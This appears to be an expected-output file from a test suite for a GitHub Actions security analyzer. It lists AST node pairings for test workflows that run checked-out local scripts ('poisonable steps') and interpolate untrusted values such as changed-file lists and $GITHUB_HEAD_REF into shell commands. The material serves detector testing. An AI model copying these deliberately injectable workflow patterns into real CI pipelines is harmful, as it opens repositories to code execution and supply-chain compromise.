-| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | -| .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | -| .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:8:15:8:38 | actions/github-script@v7 | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | -| .github/workflows/poisonable_steps.yml:11:53:11:75 | github.workspace | .github/workflows/poisonable_steps.yml:10:19:12:72 | const { default: foo } = await import('${{ github.workspace }}/scripts/foo.mjs')\nreturn foo({ github, context, core }, body, number, sender)\n | -| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:13:14:13:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | -| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:14:14:14:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | -| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:15:14:15:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | -| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:16:14:16:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | -| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:17:14:17:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | -| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:18:14:18:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | -| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:19:14:19:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | -| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:20:14:20:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | -| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:21:14:21:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | -| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:22:14:22:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | -| .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:23:14:23:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:23:9:24:6 | Run Step | -| .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:24:14:24:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:24:9:25:6 | Run Step | -| .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:25:14:25:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:25:9:26:6 | Run Step | -| .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:26:14:26:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:26:9:27:6 | Run Step | -| .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:27:14:27:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:27:9:28:6 | Run Step | -| .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:28:14:28:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:28:9:29:6 | Run Step | -| .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:29:14:29:42 | xvfb-run ./mvnw clean package | .github/workflows/poisonable_steps.yml:29:9:30:6 | Run Step | -| .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:30:14:30:46 | echo "foo" && npm i && echo "bar" | .github/workflows/poisonable_steps.yml:30:9:31:6 | Run Step | -| .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:31:14:31:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:31:9:32:6 | Run Step | -| .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:32:14:32:44 | echo "foo" \| npm i \| echo "bar" | .github/workflows/poisonable_steps.yml:32:9:33:6 | Run Step | -| .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:33:14:33:35 | echo "foo `npm i` bar" | .github/workflows/poisonable_steps.yml:33:9:34:6 | Run Step | -| .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:34:14:34:52 | dotnet test foo/Tests.csproj -c Release | .github/workflows/poisonable_steps.yml:34:9:35:6 | Run Step | -| .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:35:14:35:26 | go run foo.go | .github/workflows/poisonable_steps.yml:35:9:36:6 | Run Step | -| .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:36:14:36:86 | sed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json | .github/workflows/poisonable_steps.yml:36:9:37:6 | Run Step | -| .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:37:14:37:51 | sed -f ./config.sed file.txt > foo.txt | .github/workflows/poisonable_steps.yml:37:9:38:6 | Run Step | -| .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:38:14:38:45 | sed -f config file.txt > foo.txt | .github/workflows/poisonable_steps.yml:38:9:39:6 | Run Step | -| .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:39:14:39:55 | echo "foo" \| awk -f ./config.awk > foo.txt | .github/workflows/poisonable_steps.yml:39:9:40:6 | Run Step | -| .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:40:14:40:73 | gcloud builds submit --quiet --substitutions="COMMIT_SHA=foo | .github/workflows/poisonable_steps.yml:40:9:41:6 | Run Step | -| .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:41:14:41:22 | ./foo/cmd | .github/workflows/poisonable_steps.yml:41:9:42:6 | Run Step | -| .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:1:1:46:111 | on: push | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:5:5:46:111 | Job: local_commands | -| .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/poisonable_steps.yml:42:9:46:111 | Run Step | -| .github/workflows/poisonable_steps.yml:44:32:44:50 | env.sot_repo | .github/workflows/poisonable_steps.yml:42:14:46:111 | sed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | -| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | -| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:19:8:49 | ${{ steps.step.outputs.value }} | -| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | -| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:17:15:17:42 | tj-actions/changed-files@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | -| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:19:15:19:43 | Remove foo from changed files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:21:15:21:55 | mad9000/actions-find-and-replace-string@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:19:23:63 | ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:24:17:24:21 | foo | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:25:20:25:21 | | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | -| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:5:5:31:2 | Job: job1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | -| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | 